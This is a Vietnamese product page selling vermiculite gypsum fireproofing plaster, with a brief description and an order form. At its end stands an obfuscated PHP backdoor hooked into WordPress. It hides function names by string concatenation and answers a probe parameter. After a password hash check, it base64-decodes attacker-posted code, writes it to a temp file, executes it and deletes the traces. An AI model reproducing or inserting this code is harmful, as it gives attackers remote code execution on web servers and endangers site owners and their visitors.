THẠCH CAO VERMICULITE ( QCVN 06:2021/BXD) KHÔNG CẦN KIỂM ĐỊNH

Vermiculite thạch cao là loại hỗn hợp chống cháy vô cơ tiêu chuẩn cao được sản xuất từ Vermiculite trương nở với thạch cao và một số phụ gia khác có tính cách nhiệt chống cháy, bảo ôn, không sinh khói, không sinh khí độc hại, an toàn cho sử dụng.

Đăng Ký Tư Vấn Hỗ trợ 24/7
Danh mục:
Đặt mua THẠCH CAO VERMICULITE ( QCVN 06:2021/BXD) KHÔNG CẦN KIỂM ĐỊNH
THẠCH CAO VERMICULITE ( QCVN 06:2021/BXD) KHÔNG CẦN KIỂM ĐỊNH
Bạn vui lòng nhập đúng số điện thoại để chúng tôi sẽ gọi tư vấn chi tiết. Xin cảm ơn!
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}